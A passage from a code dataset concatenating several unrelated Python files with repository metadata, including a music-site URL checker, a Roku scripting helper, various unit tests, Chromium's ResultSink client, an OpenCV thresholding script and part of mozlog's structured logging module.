num += 1
if num >= table_num:
num = 0
for t in ts:
t.join()
def export_to_excel(dbapi, xlsx_path):
from openpyxl import Workbook
if os.path.exists(xlsx_path):
raise RuntimeError("The Excel file '%s' has existed" % xlsx_path)
wb = Workbook()
ws = wb.active
ws["A1"] = "SID"
ws["B1"] = "Song Name"
ws["C1"] = "Album Name"
ws["D1"] = "Singer Name"
ws["E1"] = "URL"
for i, m in enumerate(dbapi.get_checked_musics(), 2):
ws["A%s" % i] = m.sid
ws["B%s" % i] = m.name
ws["C%s" % i] = m.ablum
ws["D%s" % i] = m.singer
ws["E%s" % i] = m.url
wb.save(xlsx_path)
def get_site(name):
site = _SITES.get(name, None)
if not site:
raise ValueError("no support the site '%s'" % name)
return site
def refactor_str(s):
return ' '.join(s.lower().strip().split()).replace("'", "")
def refactor_ablum_name(s):
return refactor_str(s.strip().lstrip("\u300a").rstrip("\u300b"))
def check_music(site_handler, dbapi, m, equal_test=False):
try:
infos = site_handler(m.name)
except (ConnectionError, Timeout) as err:
LOG.info("Timeout: sid=%s, name=%s, singer=%s, ablum=%s, err=%s",
m.sid, m.name, m.singer, m.ablum, err)
return
url = ""
for info in infos:
url = _check_music(info, m.name, m.singer, m.ablum, equal_test)
if url:
break
try:
dbapi.set_url(m.id, url)
except Exception as err:
LOG.error("Failed to set url: %s", err)
if not infos:
LOG.warning("NotFound: sid=%s, name=%s, singer=%s, ablum=%s",
m.sid, m.name, m.singer, m.ablum)
return
def _check_music(info, song, singer, ablum, equal_test=False):
song = refactor_str(song)
singer = refactor_str(singer)
ablum = refactor_ablum_name(ablum)
if equal_test:
if info["SongName"] != song:
return ""
if singer and info["SingerName"] != singer:
return ""
if ablum and info["AlbumName"] != ablum:
return ""
else:
if singer and singer not in info["SingerName"]:
return ""
if ablum and ablum not in info["AlbumName"]:
return ""
return info["FileURL"]
def handle_musics(dbapi, site_handler, equal_test=False, num=1000, each=10):
while True:
musics = dbapi.get_unchecked_musics(num=num)
if not musics:
return
while musics:
ms = musics[:each]
musics = musics[each:]
tasks = []
for m in ms:
tasks.append(spawn(check_music, site_handler, dbapi, m, equal_test))
for t in tasks:
t.join()
@register("xiami")
class XiaMi:
SEARCH_URL = "http://www.xiami.com/search?key="
FILE_URL = ("http://www.xiami.com/play?ids=/song/playlist/id/{id}"
"/object_name/default/object_id/0")
def __init__(self):
self._session = HTMLSession()
def __call__(self, keyword):
url = self.SEARCH_URL + qs_quote(keyword)
html = self._session.get(url).html
trs = html.find(".search_result_box .track_list tr")
if not trs:
return []
results = []
for tr in trs:
tds = tr.find("td")
if len(tds) < 5:
continue
a = tds[4].find("a", first=True)
if not a:
continue
if a.attrs.get("title", "").strip() != "\u8bd5\u542c":
continue
onclick = a.attrs["onclick"].split("'")
if len(onclick) < 2:
continue
id = onclick[1].strip()
if not id:
continue
results.append({
"FileURL": self.FILE_URL.format(id=id),
"SongName": refactor_str(tds[1].text),
"SingerName": refactor_str(tds[2].text),
"AlbumName": refactor_ablum_name(tds[3].text),
})
return results
@register("kugou")
class KuGou:
CALLBACK_KEY = "jQuery112406206328947895503"
CALLBACK_LEN = len(CALLBACK_KEY) + 1
FILE_URL = "http://www.kugou.com/song/#hash={hash}&album_id={album_id}"
SEARCH_URL = ("http://songsearch.kugou.com/song_search_v2?callback={cb}&"
"page={page}&pagesize={size}&userid={userid}&keyword=")
def __init__(self, page=1, page_size=30, userid=-1):
self._url = self.SEARCH_URL.format(cb=self.CALLBACK_KEY, page=page,
size=page_size, userid=userid)
def _get_url(self, hash, album_id=""):
return self.FILE_URL.format(hash=hash, album_id=album_id) if hash else ""
def __call__(self, keyword):
url = self._url + qs_quote(keyword)
data = send_http_get(url, json=False)
if not data:
return None
data = data[self.CALLBACK_LEN:-2]
if not data:
return None
d = json.loads(data)
if d["status"] != 1 or d["error_code"] != 0:
msg = "The response error: status=%s, error_code=%s"
raise ValueError(msg % (d["status"], d["error_code"]))
results = []
for m in d["data"]["lists"]:
file1 = m.get("FileHash", None)
file2 = m.get("HQFileHash", None)
if not file1 and not file2:
continue
albumid = m.get("AlbumID", "")
url = self._get_url(file1, albumid) or self._get_url(file2, albumid)
m["FileURL"] = url
m["AlbumName"] = refactor_ablum_name(m.get("AlbumName", ""))
m["SongName"] = refactor_str(m["SongName"])
m["SingerName"] = refactor_str(m["SingerName"])
results.append(m)
return results
def main(version="1.0.0"):
conf = Configuration(description="Check the music.", version=version)
conf.register_str("log_level", default="INFO",
help="The level of the log, such as debug, info, etc.")
conf.register_str("log_file", default="", help="The file path of the log.")
conf.register_bool("print_sql", help="Print the SQL statements.")
conf.register_int("thread_num", default=0, help="The size of the coroutine pool.")
conf.register_str("site", default="xiami", help="The site name, such as xiami.")
conf.register_bool("equal_test", help="Check the music by the equal.")
conf.register_int("db_no", default=0, help="The DB index number.")
conf.register_int("db_pool_size", default=20, help="The max number of db conn pool.")
conf.register_int("db_pool_timeout", default=30, help="The timeout of pool.")
conf.register_str("db_conn", help="MySQL connection to query the music data.",
default="sqlite:///music.db")
conf.register_bool("db_create", help="Initialize the Database.")
conf.register_str("export_xlsx", default="", help="Export the result into a Excel file.")
conf.register_str("import_xlsx", default="", help="Import the musics from Excel to DB.")
conf.register_int("split_num", default=0, help="The number of the DB tables to split.")
conf.register_int_list("xlsx_cols", default=(0, 1, 2, 3),
help="The index no of id, song name, ablum name, singer.")
conf.parse()
if conf.thread_num > 0:
global taskpool, spawn
taskpool = gevent.pool.Pool(size=conf.thread_num)
spawn = taskpool.spawn
timeout = None if conf.db_create else conf.db_pool_timeout
init_logging(LOG, conf.log_level, conf.log_file)
dbapi = DBAPI(conf.db_no, conf.db_conn, max_pool_size=conf.db_pool_size,
pool_timeout=timeout, idle_timeout=300, echo=conf.print_sql)
if conf.db_create:
dbapi.create_tables()
return
if conf.import_xlsx:
import_xlsx_into_db(dbapi, conf.import_xlsx, conf.xlsx_cols, conf.split_num)
return
if conf.export_xlsx:
export_to_excel(dbapi, conf.export_xlsx)
return
try:
handle_musics(dbapi, get_site(conf.site), conf.equal_test)
except Exception:
LOG.error(traceback.format_exc())
if __name__ == "__main__":
main()
|
cd833d2493eeea9eeedea143ef1778817f442218
|
3829c6e0381216e19fec68f34eb8ef327c6989f4
|
/roku/scripting.py
|
0f65c609fcf2dd8826ee868e81cbfeb7bab38efe
|
[] |
permissive
|
jcarbaugh/python-roku
|
f9d8553ba4c1d4999dbcb4c4173b1a117ef5d512
|
b88125abca91573f4882d1265a38490a4bbff8ba
|
refs/heads/main
| 2023-08-04T08:31:43.725487
| 2023-04-22T00:13:09
| 2023-04-22T00:13:09
| 15,637,861
| 253
| 97
|
BSD-3-Clause
| 2023-07-25T21:37:57
| 2014-01-04T19:09:41
|
Python
|
UTF-8
|
Python
| false
| false
| 1,418
|
py
|
scripting.py
|
import logging
import os
import re
import time
from collections import namedtuple
SCRIPT_RE = re.compile(
r"(?P<command>\w+)(?:\:(?P<param>[\w\s]+))?(?:\@(?P<count>\d+))?(?:\*(?P<sleep>[\d\.]+))?"
) # noqa
Command = namedtuple("Command", ["command", "param", "count", "sleep"])
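# Examples of the script line format matched by SCRIPT_RE (hypothetical content):
#   "home"              -> Command(command='home', param=None, count=1, sleep=None)
#   "literal:abc@3*0.5" -> Command(command='literal', param='abc', count=3, sleep=0.5)
# ":param" supplies an argument, "@count" repeats the command and "*sleep"
# overrides the per-command delay used by run_script().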
logger = logging.getLogger("roku.scripting")
def load_script(path, params=None, raw=False):
if not os.path.exists(path):
raise ValueError(f"script at {path} not found")
with open(path) as infile:
content = infile.read()
if params:
content = content.format(**params)
if not raw:
content = content.strip().split("\n")
return content
def parse_script(script):
commands = []
for line in script:
if not line:
continue
m = SCRIPT_RE.match(line)
if m:
data = m.groupdict()
data["count"] = int(data["count"] or 1)
data["sleep"] = float(data["sleep"]) if data["sleep"] else None
commands.append(Command(**data))
return commands
def run_script(roku, script, sleep=0.5):
for cmd in script:
logger.debug(cmd)
for i in range(cmd.count or 1):
func = getattr(roku, cmd.command)
if func:
if cmd.param:
func(cmd.param)
else:
func()
time.sleep(cmd.sleep or sleep)
|
d8366688808b2dc2923ddf93355affa9134e97f5
|
45e376ae66b78b17788b1d3575b334b2cb1d0b1c
|
/tests/common/utils/test_data_structures_utils.py
|
42f4fe0657f2d327976b6668bb97a29a4fc082be
|
[
"Apache-2.0"
] |
permissive
|
bridgecrewio/checkov
|
aeb8febed2ed90e61d5755f8f9d80b125362644d
|
e64cbd27ffb6f09c2c9f081b45b7a821a3aa1a4d
|
refs/heads/main
| 2023-08-31T06:57:21.990147
| 2023-08-30T23:01:47
| 2023-08-30T23:01:47
| 224,386,599
| 5,929
| 1,056
|
Apache-2.0
| 2023-09-14T20:10:23
| 2019-11-27T08:55:14
|
Python
|
UTF-8
|
Python
| false
| false
| 950
|
py
|
test_data_structures_utils.py
|
from typing import Any
import pytest
from checkov.common.util.data_structures_utils import find_in_dict
@pytest.mark.parametrize(
"key_path,expected_value",
[
("key_99", None),
("key_1/key_2/key_3", None),
("key_1/key_2/[10]/key_3", None),
("key_1/key_5", "string"),
("key_1/key_2/[0]/key_3", 1),
("key_1/key_2/[1]/key_4", True),
],
ids=["key_not_exists", "nested_key_not_exists", "index_not_exists", "key", "index", "index_1"],
)
def test_find_in_dict(key_path: str, expected_value: Any) -> None:
input_dict = {
"key_1": {
"key_2": [
{
"key_3": 1,
},
{
"key_4": True,
},
],
"key_5": "string",
}
}
# when
actual_value = find_in_dict(input_dict, key_path)
# then
assert actual_value == expected_value
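# Illustrative sketch (not checkov's actual implementation): one way a lookup
# consistent with the expectations above could work, using "/"-separated keys
# and "[N]" segments for list indices; any missing step yields None.
def _find_in_dict_sketch(data: Any, key_path: str) -> Any:
    current = data
    for part in key_path.split("/"):
        if part.startswith("[") and part.endswith("]"):
            if not isinstance(current, list):
                return None
            index = int(part[1:-1])
            if index >= len(current):
                return None
            current = current[index]
        elif isinstance(current, dict) and part in current:
            current = current[part]
        else:
            return None
    return current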
|
c3776267123af76cecad9972a40b946eb6512b8a
|
b06340ae3dfcb551bacefa362c034b064809fd28
|
/examples/test_example_stop_on_fail.py
|
21e2dc960843972152aefa6eb1fa936ffb9a32c3
|
[
"MIT"
] |
permissive
|
okken/pytest-check
|
cd3b82ae31932d54550822abb6cc96fa6b4e7c88
|
c7e7741e4d5665a07b0985932acc484aac2d5095
|
refs/heads/main
| 2023-08-19T09:10:40.776832
| 2023-08-11T20:44:36
| 2023-08-11T20:44:36
| 108,791,429
| 282
| 35
|
MIT
| 2023-08-11T20:37:17
| 2017-10-30T02:22:27
|
Python
|
UTF-8
|
Python
| false
| false
| 604
|
py
|
test_example_stop_on_fail.py
|
"""
An example useful for playing with stop on fail.
-x or --maxfail=1 should result in one failed check and one failed test.
--maxfail=2 should run both tests and catch all 4 check failures
This is because --maxfail=1/-x stops on first failure, check or assert.
Using --maxfail=2 or more counts failing test functions, not check failures.
"""
from pytest_check import check
class TestStopOnFail:
def test_1(self):
check.equal(1, 1)
check.equal(1, 2)
check.equal(1, 3)
def test_2(self):
check.equal(1, 1)
check.equal(1, 2)
check.equal(1, 3)
|
9f0b11fa367ad2d6261563619a5ac5f60a1810cb
|
c19bcbc98555ef06276f9f0dcffc9ac35942a7c4
|
/tests/test_syslog_bsd.py
|
f1a3e389bc7ba19fecb4f321791d5d5856aa100b
|
[
"MIT"
] |
permissive
|
kellyjonbrazil/jc
|
4e81a5421cd20be5965baf375f4a5671c2ef0410
|
4cd721be8595db52b620cc26cd455d95bf56b85b
|
refs/heads/master
| 2023-08-30T09:53:18.284296
| 2023-07-30T17:08:39
| 2023-07-30T17:08:39
| 215,404,927
| 6,278
| 185
|
MIT
| 2023-09-08T14:52:22
| 2019-10-15T22:04:52
|
Python
|
UTF-8
|
Python
| false
| false
| 924
|
py
|
test_syslog_bsd.py
|
import os
import unittest
import json
import jc.parsers.syslog_bsd
THIS_DIR = os.path.dirname(os.path.abspath(__file__))
class MyTests(unittest.TestCase):
# input
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/generic/syslog-3164.out'), 'r', encoding='utf-8') as f:
syslog = f.read()
# output
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/generic/syslog-3164.json'), 'r', encoding='utf-8') as f:
syslog_json = json.loads(f.read())
def test_syslog_bsd_nodata(self):
"""
Test 'syslog_bsd' with no data
"""
self.assertEqual(jc.parsers.syslog_bsd.parse('', quiet=True), [])
def test_syslog_bsd_sample(self):
"""
Test 'syslog_bsd' with sample data
"""
self.assertEqual(jc.parsers.syslog_bsd.parse(self.syslog, quiet=True), self.syslog_json)
if __name__ == '__main__':
unittest.main()
|
d8eb343e695705f888937fcd6bb58884f60b4af2
|
26cadb387da6dc71f5536b9d74ad44b7b974d26d
|
/launch_testing/test/launch_testing/test_tools.py
|
3084120d4a1b32a35eb52d1eb8e343390546d48a
|
[
"Apache-2.0",
"BSD-3-Clause"
] |
permissive
|
ros2/launch
|
84971e86f6131976bdfaf872fca12f1a6a377cd6
|
f2b232555900d62c3cec839a49afd4cdc01cda58
|
refs/heads/rolling
| 2023-08-24T14:33:18.237122
| 2023-08-23T17:12:30
| 2023-08-23T17:12:30
| 32,485,326
| 116
| 139
|
Apache-2.0
| 2023-09-14T12:07:30
| 2015-03-18T21:27:58
|
Python
|
UTF-8
|
Python
| false
| false
| 5,547
|
py
|
test_tools.py
|
# Copyright 2019 Open Source Robotics Foundation, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import launch.actions
import launch.events
import launch.launch_context
import launch_testing.io_handler
import launch_testing.proc_info_handler
from launch_testing.tools import basic_output_filter
from launch_testing.tools import expect_output
from launch_testing.tools import ProcessProxy
def test_basic_output_filter():
filter_fn = basic_output_filter(
filtered_patterns=[r'.*\[listener\].*']
)
assert filter_fn('[listener] I heard: foo') == ''
assert filter_fn('[talker] I said: foo') == '[talker] I said: foo'
input_content = """\
[listener] I heard: foo
[listener] I heard: bar
[listener] I heard: foobar
""".replace(' ' * 4, '')
output_content = ''
assert filter_fn(input_content) == output_content
input_content = """\
[talker] I said: foo
[listener] I heard: bar
[listener] I heard: foobar
""".replace(' ' * 4, '')
output_content = """\
[talker] I said: foo
""".replace(' ' * 4, '')
assert filter_fn(input_content) == output_content
input_content = """\
[talker] I said: foo
[talker] I said: bar
[talker] I said: foobar
""".replace(' ' * 4, '')
output_content = input_content
assert filter_fn(input_content) == output_content
def test_expect_output():
output_text = """\
[talker] I said: foo
[listener] I heard: bar
[talker] I said: foo!
[listener] I heard: baz""".replace(' ' * 4, '')
output_lines = output_text.splitlines()
assert expect_output(expected_text=output_text, text=output_text)
assert expect_output(expected_text=output_text, text=output_text, strict=True)
assert expect_output(expected_lines=output_lines, text=output_text)
assert expect_output(expected_lines=output_lines, text=output_text, strict=True)
assert expect_output(expected_text=output_text, lines=output_lines)
assert expect_output(expected_text=output_text, lines=output_lines, strict=True)
assert expect_output(expected_lines=output_lines, lines=output_lines)
assert expect_output(expected_lines=output_lines, lines=output_lines, strict=True)
assert expect_output(
expected_text=re.compile(r'^\[talker\].*$', re.M), text=output_text
)
assert not expect_output(
expected_text=re.compile(r'^\[listener\].*$', re.M),
text=output_text, strict=True
)
assert expect_output(
expected_lines=[
re.compile(r'^\[talker\].*$', re.M),
re.compile(r'^\[listener\].*$', re.M)
] * 2,
text=output_text,
strict=True
)
def test_process_proxy():
proc_output = launch_testing.io_handler.ActiveIoHandler()
proc_info = launch_testing.proc_info_handler.ActiveProcInfoHandler()
process_action = launch.actions.ExecuteProcess(cmd=['ls', '-las'], name='ls')
proxy = ProcessProxy(process_action, proc_info, proc_output)
context = launch.launch_context.LaunchContext()
process_action.prepare(context)
assert not proxy.running
assert not proxy.terminated
proc_info.append(launch.events.process.ProcessStarted(
action=process_action,
name=process_action.name,
cmd=process_action.cmd,
cwd=process_action.cwd,
env=process_action.env,
pid=1001
))
proc_output.track(process_action.name)
assert proxy.running
assert not proxy.terminated
assert proxy.output == ''
assert proxy.stdout == ''
assert proxy.stderr == ''
proc_output.append(launch.events.process.ProcessStdout(
action=process_action,
text='Foobar\n'.encode('utf-8'),
name=process_action.name,
cmd=process_action.cmd,
cwd=process_action.cwd,
env=process_action.env,
pid=1001
))
assert proxy.running
assert not proxy.terminated
assert proxy.output == 'Foobar\n'
assert proxy.stdout == 'Foobar\n'
assert proxy.stderr == ''
proc_output.append(launch.events.process.ProcessStderr(
action=process_action,
text='Warning!\n'.encode('utf-8'),
name=process_action.name,
cmd=process_action.cmd,
cwd=process_action.cwd,
env=process_action.env,
pid=1001
))
assert proxy.running
assert not proxy.terminated
assert proxy.output == 'Foobar\nWarning!\n'
assert proxy.stdout == 'Foobar\n'
assert proxy.stderr == 'Warning!\n'
proc_info.append(launch.events.process.ProcessExited(
action=process_action,
returncode=0,
name=process_action.name,
cmd=process_action.cmd,
cwd=process_action.cwd,
env=process_action.env,
pid=1001
))
assert not proxy.running
assert proxy.terminated
assert proxy.exit_code == 0
assert proxy.output == 'Foobar\nWarning!\n'
assert proxy.stdout == 'Foobar\n'
assert proxy.stderr == 'Warning!\n'
|
20484aa771bd1c2c23d69a9a4f2ceb9f47f40d4c
|
a3d6556180e74af7b555f8d47d3fea55b94bcbda
|
/ios/build/bots/scripts/result_sink_util.py
|
1964791442fee01c4c834fc53270d831c4a42366
|
[
"BSD-3-Clause"
] |
permissive
|
chromium/chromium
|
aaa9eda10115b50b0616d2f1aed5ef35d1d779d6
|
a401d6cf4f7bf0e2d2e964c512ebb923c3d8832c
|
refs/heads/main
| 2023-08-24T00:35:12.585945
| 2023-08-23T22:01:11
| 2023-08-23T22:01:11
| 120,360,765
| 17,408
| 7,102
|
BSD-3-Clause
| 2023-09-10T23:44:27
| 2018-02-05T20:55:32
| null |
UTF-8
|
Python
| false
| false
| 6,613
|
py
|
result_sink_util.py
|
# Copyright 2020 The Chromium Authors
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import atexit
import base64
import cgi
import json
import logging
import os
import requests
import sys
LOGGER = logging.getLogger(__name__)
# VALID_STATUSES is a list of valid status values for test_result['status'].
# The full list can be obtained at
# https://source.chromium.org/chromium/infra/infra/+/main:go/src/go.chromium.org/luci/resultdb/proto/v1/test_result.proto;drc=ca12b9f52b27f064b0fa47c39baa3b011ffa5790;l=151-174
VALID_STATUSES = {"PASS", "FAIL", "CRASH", "ABORT", "SKIP"}
CRASH_MESSAGE = 'App crashed and disconnected.'
def _compose_test_result(test_id,
status,
expected,
duration=None,
test_log=None,
test_loc=None,
tags=None,
file_artifacts=None):
"""Composes the test_result dict item to be posted to result sink.
Args:
test_id: (str) A unique identifier of the test in LUCI context.
status: (str) Status of the test. Must be one in |VALID_STATUSES|.
duration: (int) Test duration in milliseconds or None if unknown.
expected: (bool) Whether the status is expected.
test_log: (str) Log of the test. Optional.
tags: (list) List of tags. Each item in list should be a length 2 tuple of
string as ("key", "value"). Optional.
test_loc: (dict): Test location metadata as described in
https://source.chromium.org/chromium/infra/infra/+/main:go/src/go.chromium.org/luci/resultdb/proto/v1/test_metadata.proto;l=32;drc=37488404d1c8aa8fccca8caae4809ece08828bae
file_artifacts: (dict) IDs to abs paths mapping of existing files to
report as artifact.
Returns:
    A dict of test results with input information, conforming to
https://source.chromium.org/chromium/infra/infra/+/main:go/src/go.chromium.org/luci/resultdb/sink/proto/v1/test_result.proto
"""
tags = tags or []
file_artifacts = file_artifacts or {}
assert status in VALID_STATUSES, (
'%s is not a valid status (one in %s) for ResultSink.' %
(status, VALID_STATUSES))
for tag in tags:
assert len(tag) == 2, 'Items in tags should be length 2 tuples of strings'
assert isinstance(tag[0], str) and isinstance(
tag[1], str), ('Items in'
                       ' tags should be length 2 tuples of strings')
test_result = {
'testId': test_id,
'status': status,
'expected': expected,
'tags': [{
'key': key,
'value': value
} for (key, value) in tags],
'testMetadata': {
'name': test_id,
'location': test_loc,
}
}
test_result['artifacts'] = {
name: {
'filePath': file_artifacts[name]
} for name in file_artifacts
}
if test_log:
message = ''
if sys.version_info.major < 3:
message = base64.b64encode(test_log)
else:
# Python3 b64encode takes and returns bytes. The result must be
# serializable in order for the eventual json.dumps to succeed
message = base64.b64encode(test_log.encode('utf-8')).decode('utf-8')
test_result['summaryHtml'] = '<text-artifact artifact-id="Test Log" />'
if CRASH_MESSAGE in test_log:
test_result['failureReason'] = {'primaryErrorMessage': CRASH_MESSAGE}
test_result['artifacts'].update({
'Test Log': {
'contents': message
},
})
if not test_result['artifacts']:
test_result.pop('artifacts')
if duration:
test_result['duration'] = '%.9fs' % (duration / 1000.0)
return test_result
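# Illustrative sketch (not part of the original module): the shape of the dict
# produced by _compose_test_result for a simple passing test. The test id and
# tag below are hypothetical; this helper is never called by the module.
def _example_compose_test_result():
  result = _compose_test_result(
      'MyTestCase/testExample',
      'PASS',
      expected=True,
      duration=1500,
      tags=[('platform', 'ios')])
  # result == {
  #     'testId': 'MyTestCase/testExample',
  #     'status': 'PASS',
  #     'expected': True,
  #     'tags': [{'key': 'platform', 'value': 'ios'}],
  #     'testMetadata': {'name': 'MyTestCase/testExample', 'location': None},
  #     'duration': '1.500000000s',
  # }
  return result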
class ResultSinkClient(object):
"""Stores constants and handles posting to ResultSink."""
def __init__(self):
"""Initiates and stores constants to class."""
self.sink = None
luci_context_file = os.environ.get('LUCI_CONTEXT')
if not luci_context_file:
logging.warning('LUCI_CONTEXT not found in environment. ResultDB'
' integration disabled.')
return
with open(luci_context_file) as f:
self.sink = json.load(f).get('result_sink')
if not self.sink:
logging.warning('ResultSink constants not found in LUCI context.'
' ResultDB integration disabled.')
return
self.url = ('http://%s/prpc/luci.resultsink.v1.Sink/ReportTestResults' %
self.sink['address'])
self.headers = {
'Content-Type': 'application/json',
'Accept': 'application/json',
'Authorization': 'ResultSink %s' % self.sink['auth_token'],
}
self._session = requests.Session()
# Ensure session is closed at exit.
atexit.register(self.close)
logging.getLogger("urllib3.connectionpool").setLevel(logging.WARNING)
def close(self):
"""Closes the connection to result sink server."""
if not self.sink:
return
LOGGER.info('Closing connection with result sink server.')
# Reset to default logging level of test runner scripts.
logging.getLogger("urllib3.connectionpool").setLevel(logging.DEBUG)
self._session.close()
def post(self, test_id, status, expected, **kwargs):
"""Composes and posts a test and status to result sink.
Args:
test_id: (str) A unique identifier of the test in LUCI context.
status: (str) Status of the test. Must be one in |VALID_STATUSES|.
expected: (bool) Whether the status is expected.
**kwargs: Optional keyword args. Namely:
duration: (int) Test duration in milliseconds or None if unknown.
test_log: (str) Log of the test. Optional.
tags: (list) List of tags. Each item in list should be a length 2 tuple
of string as ("key", "value"). Optional.
file_artifacts: (dict) IDs to abs paths mapping of existing files to
report as artifact.
"""
if not self.sink:
return
self._post_test_result(
_compose_test_result(test_id, status, expected, **kwargs))
def _post_test_result(self, test_result):
"""Posts single test result to server.
This method assumes |self.sink| is not None.
Args:
      test_result: (dict) Conforming to the protocol defined in
https://source.chromium.org/chromium/infra/infra/+/main:go/src/go.chromium.org/luci/resultdb/sink/proto/v1/test_result.proto
"""
res = self._session.post(
url=self.url,
headers=self.headers,
data=json.dumps({'testResults': [test_result]}),
)
res.raise_for_status()
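# Illustrative sketch (not part of the original module): typical usage. When
# LUCI_CONTEXT is absent the client silently no-ops, so this is safe to call
# outside a LUCI environment. The test id and log text are hypothetical.
def _example_report_result():
  client = ResultSinkClient()
  client.post(
      'MyTestCase/testExample',
      status='PASS',
      expected=True,
      duration=1500,
      test_log='Test passed.')
  client.close()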
|
40e02e9662be9e7b5bd53db48d4a3d7757208bcf
|
0d9b75fee49b37038a10e467c39cf75c9cf4d5ae
|
/OpenCV_learn/code_045/opencv_045.py
|
7111bcb3aecc83dda462febeac76a68b054b75f1
|
[] |
no_license
|
MachineLP/OpenCV-
|
743a5fcfc3f300ccb135f869e2f048cb5fdcd02a
|
f3da4feb71c20d2e8bc426eb5a4e2e61a2fd4a75
|
refs/heads/master
| 2023-03-23T15:31:22.985413
| 2023-03-08T09:33:28
| 2023-03-08T09:33:28
| 178,887,816
| 104
| 51
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,156
|
py
|
opencv_045.py
|
import cv2 as cv
import numpy as np
def method_1(image):
gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
t, binary = cv.threshold(gray, 0, 255, cv.THRESH_BINARY | cv.THRESH_OTSU)
return binary
def method_2(image):
blurred = cv.GaussianBlur(image, (3, 3), 0)
gray = cv.cvtColor(blurred, cv.COLOR_BGR2GRAY)
t, binary = cv.threshold(gray, 0, 255, cv.THRESH_BINARY | cv.THRESH_OTSU)
return binary
def method_3(image):
blurred = cv.pyrMeanShiftFiltering(image, 10, 100)
gray = cv.cvtColor(blurred, cv.COLOR_BGR2GRAY)
t, binary = cv.threshold(gray, 0, 255, cv.THRESH_BINARY | cv.THRESH_OTSU)
return binary
src = cv.imread("./test.png")
h, w = src.shape[:2]
ret = method_3(src)
result = np.zeros([h, w*2, 3], dtype=src.dtype)
result[0:h,0:w,:] = src
result[0:h,w:2*w,:] = cv.cvtColor(ret, cv.COLOR_GRAY2BGR)
cv.putText(result, "input", (10, 30), cv.FONT_ITALIC, 1.0, (0, 0, 255), 2)
cv.putText(result, "binary", (w+10, 30), cv.FONT_ITALIC, 1.0, (0, 0, 255), 2)
cv.imshow("result", result)
cv.imwrite("./binary_result.png", result)
cv.waitKey(0)
cv.destroyAllWindows()
|
19dd23872e8261c7b62ef2e337e7d170b8b13418
|
a3d6556180e74af7b555f8d47d3fea55b94bcbda
|
/third_party/wpt_tools/wpt/tools/third_party_modified/mozlog/mozlog/structuredlog.py
|
20924e8b16a61cbbe771547a2395b1a0c35b5a7a
|
[
"BSD-3-Clause",
"GPL-1.0-or-later",
"MIT",
"LGPL-2.0-or-later",
"Apache-2.0"
] |
permissive
|
chromium/chromium
|
aaa9eda10115b50b0616d2f1aed5ef35d1d779d6
|
a401d6cf4f7bf0e2d2e964c512ebb923c3d8832c
|
refs/heads/main
| 2023-08-24T00:35:12.585945
| 2023-08-23T22:01:11
| 2023-08-23T22:01:11
| 120,360,765
| 17,408
| 7,102
|
BSD-3-Clause
| 2023-09-10T23:44:27
| 2018-02-05T20:55:32
| null |
UTF-8
|
Python
| false
| false
| 27,968
|
py
|
structuredlog.py
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import json
import sys
import time
import traceback
from multiprocessing import current_process
from threading import Lock, current_thread
from .logtypes import (
Any,
Boolean,
Dict,
Int,
List,
Nullable,
Status,
SubStatus,
TestId,
TestList,
Tuple,
Unicode,
convertor_registry,
log_action,
)
"""Structured Logging for recording test results.
Allowed actions, and subfields:
suite_start
tests - List of test names
name - Name for the suite
run_info - Dictionary of run properties
add_subsuite
name - Name for the subsuite (must be unique)
run_info - Updates to the suite run_info (optional)
suite_end
test_start
test - ID for the test
path - Relative path to test (optional)
subsuite - Name of the subsuite to which test belongs (optional)
test_end
test - ID for the test
status [PASS | FAIL | OK | ERROR | TIMEOUT | CRASH |
            ASSERT | PRECONDITION_FAILED | SKIP] - test status
expected [As for status] - Status that the test was expected to get,
or absent if the test got the expected status
extra - Dictionary of harness-specific extra information e.g. debug info
known_intermittent - List of known intermittent statuses that should
not fail a test. eg. ['FAIL', 'TIMEOUT']
subsuite - Name of the subsuite to which test belongs (optional)
test_status
test - ID for the test
subtest - Name of the subtest
status [PASS | FAIL | TIMEOUT |
PRECONDITION_FAILED | NOTRUN | SKIP] - test status
expected [As for status] - Status that the subtest was expected to get,
or absent if the subtest got the expected status
known_intermittent - List of known intermittent statuses that should
not fail a test. eg. ['FAIL', 'TIMEOUT']
subsuite - Name of the subsuite to which test belongs (optional)
process_output
process - PID of the process
command - Command line of the process
data - Output data from the process
test - ID of the test that the process was running (optional)
subsuite - Name of the subsuite that the process was running (optional)
assertion_count
count - Number of assertions produced
min_expected - Minimum expected number of assertions
max_expected - Maximum expected number of assertions
subsuite - Name of the subsuite for the tests that ran (optional)
lsan_leak
frames - List of stack frames from the leak report
scope - An identifier for the set of tests run during the browser session
(e.g. a directory name)
allowed_match - A stack frame in the list that matched a rule meaning the
leak is expected
subsuite - Name of the subsuite for the tests that ran (optional)
lsan_summary
bytes - Number of bytes leaked
allocations - Number of allocations
allowed - Boolean indicating whether all detected leaks matched allow rules
subsuite - Name of the subsuite for the tests that ran (optional)
mozleak_object
process - Process that leaked
bytes - Number of bytes that leaked
name - Name of the object that leaked
scope - An identifier for the set of tests run during the browser session
(e.g. a directory name)
allowed - Boolean indicating whether the leak was permitted
subsuite - Name of the subsuite for the tests that ran (optional)
log
level [CRITICAL | ERROR | WARNING |
INFO | DEBUG] - level of the logging message
message - Message to log
Subfields for all messages:
action - the action type of the current message
time - the timestamp in ms since the epoch of the log message
thread - name for the thread emitting the message
pid - id of the python process in which the logger is running
source - name for the source emitting the message
component - name of the subcomponent emitting the message
"""
_default_logger_name = None
def get_default_logger(component=None):
"""Gets the default logger if available, optionally tagged with component
name. Will return None if not yet set
:param component: The component name to tag log messages with
"""
global _default_logger_name
if not _default_logger_name:
return None
return StructuredLogger(_default_logger_name, component=component)
def set_default_logger(default_logger):
"""Sets the default logger to logger.
It can then be retrieved with :py:func:`get_default_logger`
Note that :py:func:`~mozlog.commandline.setup_logging` will
set a default logger for you, so there should be no need to call this
